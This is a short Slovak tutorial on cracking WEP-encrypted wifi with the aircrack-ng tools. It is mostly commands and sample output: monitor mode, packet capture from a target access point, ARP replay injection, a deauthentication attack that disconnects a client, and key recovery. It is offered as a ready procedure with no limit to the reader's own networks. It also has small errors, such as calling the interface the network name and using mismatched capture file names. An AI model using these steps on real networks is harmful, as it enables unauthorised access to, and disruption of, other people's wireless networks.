Postup ako prelomiť wifi WEP
sudo –i (prihlásiš sa ako root)
airmon-ng start wlan0 (wlan0 je názov wifi siete, získaš ho príkazom ifconfig )
airodump-ng mon0 (vypíše zoznam nájdených sieti)
potom si vyberieš sieť ktorú chceš testovať a dáš tento príkaz
airodump-ng -w capture --bssid 00:14:6C:7E:40:80 -c 9 mon0
-c - číslo kanálu na danej siete ktorú chceš testovať
--bssid - 00:14:6C:7E:40:80 /*MAC adresa AP*/
-w capture - názov súboru - nemusí byt output, môžeš si dať akýkoľvek názov
-w - znamená vytvoriť súbor kde sa ukladajú zachytene dáta
|
BSSID |
PWR |
RXQ |
Beacons |
Data |
CH |
MB |
ENC |
CIPHER |
AUTH |
ESSID |
|
00:14:6C:7E:40:80 |
42 |
100 |
5240 |
178307 |
9 |
54 |
WEP |
WEP |
|
teddy |
|
BSSID |
STATION |
PWR |
Lost |
Packets |
Probes |
|
00:14:6C:7E:40:80 |
00:0F:B5:88:AC:82 |
42 |
0 |
183782 |
|
BSSID 00:14:6C:7E:40:80 (MAC adresa routera)
STATION (MAC adresa klienta, ktorý je pripojený na danej sieti)
-----------------------------------
Otvor nove okno a zadaj príkaz:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
-3 - znamená zachytávanie ARP packetov a packet injection
-b 00:14:6C:7E:40:80 - je MAC adresa AP
-h 00:0F:B5:88:AC:82 - je MAC adresa nejakého klienta
Read 629399 packets (got 0 ARP requests), sent 0 packets...
------------------------------
Otvor ďalšie terminálové okno, zadaj príkaz:
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0
Poznámka:
týmto deautentifikuješ klienta, on sa automaticky pripojí a ty získaš ARP packet potrebný pre packet injection
ak nezachitíš ARP packet počkaj cca 1 min a zopakuj (ARP packet by si mal zachytiť )
...osobne ja som tento príkaz pri kódovaní WEP ešte nepotreboval
-------------------------------
Otvor ďalšie okno a už len pusti aircrack-ng
aircrack-ng output-01.cap (cesta k súboru)
Poznámka:
... väčšinou sa to ukladá do domovského priečinku ROOT , takže cestu zadávať nemusíš
Video:
How to hack a WPA/WPA2